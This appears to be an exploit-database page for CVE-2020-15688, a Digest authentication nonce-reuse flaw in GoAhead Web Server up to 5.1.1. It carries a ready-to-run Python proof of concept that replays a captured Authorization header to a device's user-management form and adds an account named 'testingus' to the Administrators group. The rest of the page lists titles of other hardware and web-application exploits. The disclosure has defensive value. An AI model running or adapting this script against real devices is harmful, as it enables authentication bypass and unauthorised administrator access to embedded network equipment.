Search for hundreds of thousands of exploits

"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-10-27

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
# Date: 2019-08-29
# Exploit Author: LiquidWorm
# Software Link: https://www.embedthis.com
# Version: 5.1.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
#
#
# Vendor: Embedthis Software LLC
# Product web page: https://www.embedthis.com
# Affected version: <=5.1.1 and <=4.1.2
# Fixed version: >=5.1.2 and >=4.1.3
#
# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
# ideal for the smallest of embedded devices.
#
# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
# server does not completely protect against replay attacks. This allows an unauthenticated
# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
# which permitted short-period replays. This duration is too long for most implementations.
#
# Tested on: GoAhead-http
#            GoAhead-Webs
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2020-5598
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
#
# CVE ID: CVE-2020-15688
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
#          https://nvd.nist.gov/vuln/detail/CVE-2020-15688
#
# CWE ID: CWE-294 Authentication Bypass by Capture-replay
# CWE URL: https://cwe.mitre.org/data/definitions/294.html
# 
# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
# CWE URL: https://cwe.mitre.org/data/definitions/323.html
#
# GoAhead Security Alerts / Fix:
#  https://github.com/embedthis/goahead-gpl/issues/3
#  https://github.com/embedthis/goahead-gpl/issues/2
#  https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
#
#
# 29.08.2019
#


#
# PoC for a network controller running GoAhead web server.
# Replay Authentication Bypass / Create Admin User
#

import requests
import sys#####

if (len(sys.argv) <= 1):
    print("Usage: ./nen.py <ipaddress>")
    exit(0)

ip = sys.argv[1]

url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
kolache = {"lang":"en"}

replay  = "Digest username=\"admin\", "
replay += "realm=\"GoAhead\", "
replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
replay += "algorithm=MD5, "
replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
replay += "qop=auth, "
replay += "nc=0000000a, "
replay += "cnonce=\"0649f631320f23bb\""

headers = {"Cache-Control": "max-age=0",
           "Authorization": replay,
           "Content-Type": "application/x-www-form-urlencoded",
           "User-Agent": "NoProxy/NoProblem.251",
           "Accept-Encoding": "gzip, deflate",
           "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
           "Connection": "close"}

data = {"FormSubmitCause": "button",
        "DefinitionAction": "add",
        "Define_admin_ID": "admin",
        "Define_admin_Name": "admin",
        "Define________Action________ID": '',
        "Define________Action________Name": "testingus",
        "Define________Action________Password": "testingus",
        "Define________Action________Group": "Administrators"}

requests.post(url, headers=headers, cookies=kolache, data=data)

print("Finito")
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - CAPTCHA Security Bypass" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Improper Access Control Privilege Escalation" webapps hardware LiquidWorm
2020-11-05 "iDS6 DSSPro Digital Signage System 6.2 - Cross-Site Request Forgery (CSRF)" webapps hardware LiquidWorm
2020-10-27 "Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root" remote hardware LiquidWorm
2020-10-27 "TDM Digital Signage PC Player 4.1 - Insecure File Permissions" local windows LiquidWorm
2020-10-27 "GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse" remote hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure" webapps hardware LiquidWorm
2020-10-26 "ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure" webapps hardware LiquidWorm
2020-10-07 "BACnet Test Server 1.01 - Remote Denial of Service (PoC)" dos windows LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure" webapps hardware LiquidWorm
2020-10-01 "Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow" remote hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal" webapps hardware LiquidWorm
2020-10-01 "BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration" webapps hardware LiquidWorm
2020-10-01 "SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure" webapps multiple LiquidWorm
2020-09-25 "B-swiss 3 Digital Signage System 3.6.5 - Cross-Site Request Forgery (Add Maintenance Admin)" webapps multiple LiquidWorm
2020-09-21 "B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution" webapps multiple LiquidWorm
2020-09-14 "Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path" local windows LiquidWorm
2020-08-28 "Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation" webapps hardware LiquidWorm
2020-08-26 "Eibiz i-Media Server Digital Signage 3.8.0 - Directory Traversal" webapps multiple LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Authentication Bypass" webapps hardware LiquidWorm
2020-08-24 "Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure" webapps hardware LiquidWorm
2020-08-17 "QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure" webapps hardware LiquidWorm
2020-08-07 "All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48958/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.